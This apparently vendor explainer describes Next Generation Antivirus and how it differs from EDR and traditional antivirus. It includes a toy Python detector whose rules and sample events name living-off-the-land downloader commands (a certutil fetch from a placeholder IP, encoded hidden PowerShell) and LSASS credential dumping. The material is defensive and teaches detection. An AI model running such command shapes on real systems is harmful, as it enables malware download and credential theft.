What is Next Generation Antivirus (NGAV)?

Next Generation Antivirus is considered a step forward in antivirus (AV) capabilities. It keeps the known, signature-based prevention of traditional AV and adds behavioral analysis plus artificial intelligence (AI) and/or machine learning (ML) classification, so a file or process can be blocked on what it does rather than only on whether its hash is already known. NGAV telemetry also commonly feeds endpoint and extended detection and response (EDR/XDR) tooling, where alerts from multiple sources are correlated into actionable threat intelligence to anticipate and prevent threats faster.

NGAV is typically delivered as a lightweight endpoint agent managed from a cloud console, which has a lighter impact on systems and endpoints than a locally managed signature database, and it is increasingly the more common type of AV in organizations and enterprises.

NGAV vs. Endpoint Detection and Response (EDR)

NGAV and EDR are complementary layers on the same endpoint. NGAV is the prevention layer: it tries to stop malicious files and behaviors before or as they execute. EDR is the detection and response layer: it continuously records endpoint activity (process starts, file and registry changes, network connections) so analysts can detect, investigate, and contain whatever gets past prevention. Bad actors could still find a way to an endpoint like a phone or laptop, so a good EDR solution is the last line of defense.

NGAV vs. Anti-malware

Again, it's the broad versus the specific here. As mentioned above, a modern NGAV solution leverages advanced analytics to anticipate and block threats based on behavior as well as signatures. Anti-malware solutions are narrower: they are primarily designed to scan individual systems for malicious files, including malware built to bypass security controls, and to remove them.

How Does NGAV Work? 

NGAV works by detecting and preventing both file-based malware and fileless attacks. It combines pre-execution analysis (inspecting and classifying a file before it is allowed to run) with monitoring of what processes actually do at runtime, so it can block the tactics, techniques, and procedures (TTPs) used deliberately by bad actors or unwittingly by someone who is properly credentialed. Let's take a closer look at how an NGAV solution accomplishes its detection and prevention goals:

  • Memory injection prevention blocks fileless threats that inject code into the memory of a running, often legitimate, process so that nothing malicious ever has to be written to the file system. Blocking the injection stops the malicious code from executing and from hiding behind the legitimate process.
  • Malicious document prevention breaks or otherwise disarms documents that try to abuse features such as macros, embedded scripts, and built-in tools (for example, an Office application that spawns a script interpreter). By doing this, it allows users to benefit from the full capabilities of modern applications and worry less about infections.
  • Living-off-the-land prevention interferes with attempts to misuse system-native tools (script interpreters and the download or execution utilities that ship with the operating system) that would otherwise cause damage without the need to deploy classic forms of malware. Threats aren't able to "trampoline" off of these native tools to infect the endpoint.
  • Operating system credential dumping protection blocks attempts to steal credentials from the operating system itself, such as reading password hashes or plaintext secrets out of the memory of the process that handles authentication (LSASS on Windows) or out of the local credential store.
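To make the four prevention categories above concrete, here is an added example (not code from Rapid7 or from any NGAV product) of the kind of behavioral rules an NGAV engine applies to endpoint telemetry, run over constructed process events. The event format, the rule patterns, the allowlists, the process names and the sample events are all assumptions made for illustration. It also shows why a hash signature alone is not enough: a copy of a known-bad dropper with a single byte appended no longer matches the signature store, but its follow-on behavior is still caught.

```python
"""Toy model of NGAV-style behavioral prevention rules (added example, not
vendor code). Event format, rule patterns, allowlists and sample events are
all constructed for illustration."""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass

# --- Signature layer: a hypothetical known-bad hash store -------------------
KNOWN_BAD_SAMPLE = b"MZ\x90\x00constructed dropper bytes"   # constructed, not real malware
KNOWN_BAD_HASHES = {hashlib.sha256(KNOWN_BAD_SAMPLE).hexdigest()}

# --- Behavioral layer: the four prevention categories from the text ---------
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}
# Command-line shapes of commonly abused system-native tools (LOLBins).
LOLBIN_PATTERNS = [
    (re.compile(r"certutil(\.exe)?\s+.*-urlcache", re.I), "certutil used as a downloader"),
    (re.compile(r"mshta(\.exe)?\s+.*(https?|javascript|vbscript):", re.I), "mshta running remote or inline script"),
    (re.compile(r"regsvr32(\.exe)?\s+.*/i:https?://", re.I), "regsvr32 loading a remote scriptlet"),
    (re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I), "encoded PowerShell command"),
]
PROCESS_VM_READ = 0x0010          # Windows access right needed to read another process's memory
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "msmpeng.exe"}   # assumed trusted LSASS readers
INJECTION_ALLOWLIST = {"csrss.exe", "msmpeng.exe"}             # assumed trusted injectors


@dataclass
class Event:
    kind: str                 # "process_create" | "process_access" | "remote_thread"
    image: str                # acting process image name, lower-case
    parent_image: str = ""    # process_create only
    cmdline: str = ""         # process_create only
    target_image: str = ""    # process_access / remote_thread: the victim process
    access_mask: int = 0      # process_access: requested access rights
    file_sha256: str = ""     # process_create: hash of the image on disk


def evaluate(ev: Event) -> list[str]:
    """Return the names of every prevention rule the event trips (empty = allow)."""
    hits: list[str] = []
    if ev.file_sha256 and ev.file_sha256 in KNOWN_BAD_HASHES:
        hits.append("signature: known-bad file hash")
    if ev.kind == "process_create":
        # Malicious document: an Office application spawning a script host.
        if ev.parent_image in OFFICE_APPS and ev.image in SCRIPT_HOSTS:
            hits.append("malicious document: Office spawned a script host")
        # Living off the land: a native tool invoked in a known-abusive way.
        for pattern, label in LOLBIN_PATTERNS:
            if pattern.search(ev.cmdline):
                hits.append(f"living-off-the-land: {label}")
    elif ev.kind == "process_access":
        # Credential dumping: reading LSASS memory from an untrusted process.
        if (ev.target_image == "lsass.exe" and ev.access_mask & PROCESS_VM_READ
                and ev.image not in LSASS_ALLOWLIST):
            hits.append("credential dumping: read access to LSASS memory")
    elif ev.kind == "remote_thread":
        # Memory injection: a thread created inside a different process.
        if ev.target_image != ev.image and ev.image not in INJECTION_ALLOWLIST:
            hits.append("memory injection: remote thread created in another process")
    return hits


def scan(events: list[Event]) -> list[tuple[int, list[str]]]:
    """Evaluate a telemetry stream; return (index, rule hits) for blocked events."""
    flagged = []
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            flagged.append((i, hits))
    return flagged


# Constructed telemetry: a dropper, a repacked copy of it, and follow-on activity.
SAMPLE_EVENTS = [
    Event("process_create", "dropper.exe", "explorer.exe", "dropper.exe",
          file_sha256=hashlib.sha256(KNOWN_BAD_SAMPLE).hexdigest()),
    # Same dropper with one byte appended: the hash signature no longer matches.
    Event("process_create", "dropper.exe", "explorer.exe", "dropper.exe",
          file_sha256=hashlib.sha256(KNOWN_BAD_SAMPLE + b"\x00").hexdigest()),
    Event("process_create", "powershell.exe", "winword.exe",
          "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),  # constructed fragment
    Event("process_create", "certutil.exe", "cmd.exe",
          "certutil.exe -urlcache -split -f http://198.51.100.7/a.dat a.dat"),
    Event("process_access", "dump.exe", target_image="lsass.exe", access_mask=0x1010),
    Event("process_access", "msmpeng.exe", target_image="lsass.exe", access_mask=0x1010),
    Event("remote_thread", "update.exe", target_image="explorer.exe"),
    Event("process_create", "notepad.exe", "explorer.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index} blocked: {'; '.join(hits)}")
```

Running the script blocks events 0, 2, 3, 4 and 6 and lets 1, 5 and 7 through: the repacked dropper (event 1) slips past the signature store, which is the gap the behavioral rules exist to close, while the allowlisted security agent reading LSASS (event 5) and the plain Notepad launch (event 7) are correctly left alone. A real product replaces these handful of regexes and allowlists with ML classifiers and a far larger rule set, but the shape of the decision is the same.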

Providers of NGAV solutions and services typically design the technology to be deployed quickly and to run without noticeably degrading the performance of network systems or endpoints.

NGAV vs. Traditional AV

When we talk about NGAV, those last two letters still carry a lot of history. The term "antivirus" has been part of computing for decades, so it bears asking: what exactly are the differences between modern NGAV and traditional AV?

Traditional AV focuses on the individual endpoint: it matches files against a database of known signatures and quarantines what it recognizes, or removes an affected device from service. When that device is part of a larger piece of critical infrastructure, taking it offline can cause a larger disruption among devices that were never infected, which can lead to a business enduring significant financial and reputational damage.

NGAV moves beyond these traditional AV processes, blocking diverse attacks, including fileless malware, across the entire endpoint ecosystem. NGAV's main goal is to detect and prevent attacks before they reach critical endpoints anywhere on the network. Not only that: by using ML and AI, it can recognize evasive actions that have no signature yet. More detection technology alone won't solve the problem of malware and other threats; smarter detection focused on prevention is what puts attackers on the defensive.

One last key difference concerns the previously mentioned concept of learning. Traditional AV depends on a static signature database that is only as good as its last update; it cannot adapt to a system's unique behaviors. NGAV, on the other hand, can learn from past behavior of the endpoints, systems, and networks on which it's installed. This is why it is better at detecting evasive actions and blocking threats much earlier in the kill chain than was previously possible.

What are the Benefits of NGAV? 

The benefits of NGAV are numerous compared to traditional AV, and they can accelerate an organization's broader detection and response (D&R) program.

Prevent Threats Earlier 

For businesses and security organizations to stand against modern threats, they must outpace the evasion techniques attackers use against endpoint defenses. This includes blocking known and unknown threats sooner in the kill chain, cutting off endpoint and deep-system access, or even preventing network access entirely. Traditional AV typically relies on signature-based detection alone, whereas NGAV combines signature-based detection with AI and ML to surface the TTPs used by today's attackers.

Gain Endpoint Visibility 

As previously mentioned, ML and AI give NGAV solutions the ability to adapt to the specific behaviors of the systems they're tasked with protecting. This helps analysts gain a deeper understanding of their endpoints and network systems, so they can defend against threats and design better protections based on telemetry that could indicate an impending attack.

See Results Fast

NGAV solutions are generally designed to be lightweight, add-on technology that won't slow down system operations, and therefore won't slow down security personnel either. A typical agent has a small footprint that deploys quickly, drives key insights, and enables a faster mean time to respond (MTTR) with actions like automated asset and process containment.

Evolve Traditional AV 

With lower operational costs, more efficient threat intelligence and detection capabilities, and comprehensive coverage, NGAV solutions are typically ideal for security professionals looking to further consolidate across the tech stack. As a value-add for an existing detection and response (D&R) solution an organization may already have, NGAV can accelerate the breaking down of silos between security practices. This can be a productivity, efficiency, and growth driver for security operations centers (SOCs) that may already be stretched thin.

NGAV Solution: Questions to Consider

As with any solution – especially shopping for one within a category that has the buzzy phrase “next gen” in its name – there are many options and potential vendors. So, it’s best to know how to find one that can tailor an NGAV solution to your unique environment.

  • How are you using your current AV solution(s)? The heart of this question would center on strategy. Is there a system or plan in place for how AV is deployed, and what exactly is it built to protect? If a standard enterprise AV is not properly designed to protect the system on which it's running, then your organization may need to recalibrate. 
  • How much maintenance goes into AV on each endpoint? Traditional AV often means per-endpoint signature updates and locally managed consoles. As covered on this page, a modern NGAV agent is managed from the cloud and gets ahead of attacks with behavioral and ML-based detection rather than a signature database alone, so keeping separately maintained AV running on hundreds or thousands of endpoints doesn't take advantage of those efficiencies.
  • How much visibility do you have into current endpoint events? A competent team is going to have a good amount of visibility into their network and the endpoints on it. The question is, could you benefit from more and leverage the insights that visibility brings to better plan and proactively defend? 
  • How important are lower operational costs to your CISO? The answer here may seem obvious, but holistic solutions that break down silos and consolidate capabilities are increasingly contributing to an uptick in productivity and lower overall costs versus maintaining multi-provider products. While those individual products may be effective, they can create workforce lag when looked at in tandem with other bespoke solutions under an organization’s umbrella.
  • What is the current state of your cloud operations/security? Keep in mind that the ideal state to deploy an NGAV solution is one where robust cloud-operations are currently in place. This will make it possible to get the solution up and running in near-real time and begin seeing benefits almost immediately.

Read More

Antivirus: Latest Rapid7 Blog Posts

Rapid7 Research: Encapsulating Antivirus (AV) Evasion Techniques in Metasploit Framework